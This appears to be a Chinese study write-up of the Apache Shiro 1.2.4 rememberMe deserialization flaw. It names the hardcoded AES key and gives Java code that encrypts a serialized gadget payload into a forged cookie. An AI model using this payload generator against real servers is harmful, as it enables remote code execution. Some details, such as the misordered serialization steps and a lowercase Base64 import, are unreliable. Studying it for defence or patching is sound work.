shiro124是一个比较老的反序列化漏洞了,一直都没有对这个漏洞进行深刻的了解,直到学习了CC链之后,回过头来在看,才知道所有一切的真相~
0x01 shiro124简单的说shiro是一个认证框架,用来做认证的。
124的反序列化也是非常简单:
shiro利用的首先是rememberMe的反序列化过程,过程分为三步:
- base64解码
- 解密
- 反序列化
同样序列化也分为三步:
- 反序列化
- 加密
- base64解密
其中最重要的就是加密了,如果没有加密的秘钥就没有办法进行伪造,这里感谢程序员写的硬编码。
加密秘钥:
orgapacheshiromgtAbstractRememberMeManager.java 80行
在shiro125中变成了获取随机秘钥了。
当发现cookie中带有rememberMe字段时,就会触发getRememberedPrincipals方法:
orgapacheshiromgtAbstractRememberMeManager.java 390行 getRememberedPrincipals
在这个方法中,getRememberedSerializedIdentity会获取到base64解密的rememberMe的内容。
接着会调用convertBytesToPrincipals方法进行解密和反序列化。
解码过程就是讲秘钥代入然后解密,将加密的内容进行反序列化。
选择什么序列化链和调用的java版本以及库的版本相关,所以在测试的时候需要进行批量测试,才知道使用哪些调用链。
默认的shiro会存在Commons Collection库,也就是会存在cc链,当然最新版本目前还未发现。
package org.vulhub.shirodemo;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.base64;
import org.apache.shiro.io.DefaultSerializer;
import java.io.FileWriter;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;
class TestRemember {
public static void main(String[] args) throws Exception {
byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("./cs"));
AesCipherService aes = new AesCipherService();
byte[] key = base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
ByteSource ciphertext = aes.encrypt(payloads, key);
System.out.printf(ciphertext.toString());
try (FileWriter fileWriter = new FileWriter("./paylod.txt")) {
fileWriter.append(ciphertext.toString());
}
}
}
